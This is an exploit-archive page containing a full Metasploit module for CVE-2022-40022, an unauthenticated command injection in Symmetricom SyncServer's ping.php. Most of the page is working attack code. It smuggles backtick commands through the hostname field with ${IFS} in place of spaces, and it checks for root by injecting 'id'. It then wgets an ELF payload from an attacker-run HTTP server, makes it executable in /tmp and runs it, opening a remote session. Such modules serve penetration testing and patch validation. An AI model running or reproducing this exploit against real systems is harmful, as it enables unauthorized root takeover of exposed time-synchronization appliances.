Symmetricom SyncServer Unauthenticated Remote Command Execution Exploit

2023-06-1700:00:00

metasploit

0day.today

179

metasploit

symmetricom

command injection

vulnerability

unauthenticated

exploit

session handling

patched

cve-2022-40022

http

srvport

lport

linux

payload

check

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.822

Percentile

98.5%

JSON

This Metasploit module exploits an unauthenticated command injection vulnerability in /controller/ping.php in Symmetricom SyncServer. The S100 through S350 (End of Life) models should be vulnerable to unauthenticated exploitation due to a session handling vulnerability.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Symmetricom SyncServer Unauthenticated Remote Command Execution',
        'Description' => %q{
          This module exploits an unauthenticated command injection vulnerability in /controller/ping.php.
          The S100 through S350 (End of Life) models should be vulnerable to
          unauthenticated exploitation due to a session handling vulnerability.
          Later models require authentication which is not provided in this module because we can't test it.
          The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022).
          Run 'check' first to determine if vulnerable.
          The server limits outbound ports. Ports 25 and 80 TCP were successfully used for SRVPORT
          and LPORT while testing this module.
        },
        'Author' => [
          'Steve Campbell', # @lpha3ch0 - Exploit PoC, Metasploit module
          'Justin Fatuch Apt4hax', # Exploit PoC
          'Robert Bronstein' # Metasploit Module
        ],
        'References' => [
          ['CVE', '2022-40022'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-40022']
        ],
        'DisclosureDate' => '2022-08-31',
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          [ 'Automatic', {} ],
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
        }
      )
    )
    register_options(
      [
        OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']),
        OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']),
        OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444'])
      ], self.class
    )
  end

  def primer; end

  def on_request_uri(cli, req)
    @pl = generate_payload_exe
    print_status("#{peer} - Payload request received: #{req.uri}")
    send_response(cli, @pl)
  end

  def check
    uri = '/controller/ping.php'
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'vars_post' =>
          {
            'currentTab' => 'ping',
            'refreshMode' => 'dirty',
            'ethDirty' => 'false',
            'snmpCfgDirty' => 'false',
            'snmpTrapDirty' => 'false',
            'pingDirty' => 'true',
            'hostname' => "\`id\`",
            'port' => 'eth0',
            'pingType' => 'ping'
          }
    })
    if res && res.body.to_s =~ /uid=0/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def request(cmd)
    uri = '/controller/ping.php'
    send_request_cgi({
      'method' => 'POST',
      'Content-Type' => 'application/x-www-form-encoded',
      'uri' => uri,
      'vars_post' =>
      {
        'currentTab' => 'ping',
        'refreshMode' => 'dirty',
        'ethDirty' => 'false',
        'snmpCfgDirty' => 'false',
        'snmpTrapDirty' => 'false',
        'pingDirty' => 'true',
        'hostname' => cmd,
        'port' => 'eth0',
        'pingType' => 'ping'
      }
    })
  end

  def exploit
    srvhost = datastore['SRVHOST']
    srvport = datastore['SRVPORT']
    filename = datastore['FILENAME']
    resource_uri = '/' + filename
    shell_path = '/tmp/'
    cmds = [
      "\`wget${IFS}http://" + srvhost + ':' + srvport + '/' + filename + '${IFS}-O${IFS}' + shell_path + filename + "\`",
      "\`chmod${IFS}700${IFS}" + shell_path + filename + "\`",
      "\`" + shell_path + filename + "\`"
    ]
    start_service({
      'Uri' => {
        'Proc' => proc { |cli, req|
                    on_request_uri(cli, req)
                  },
        'Path' => resource_uri
      }
    })
    print_status("#{rhost}:#{rport} - Exploit started...")
    print_status("#{rhost}:#{rport} - Sending wget command...")
    request(cmds[0])
    sleep(3)
    print_status("#{rhost}:#{rport} - Making payload executable...")
    request(cmds[1])
    sleep(3)
    print_status("#{rhost}:#{rport} - Executing payload...")
    request(cmds[2])
    sleep(3)
  end
end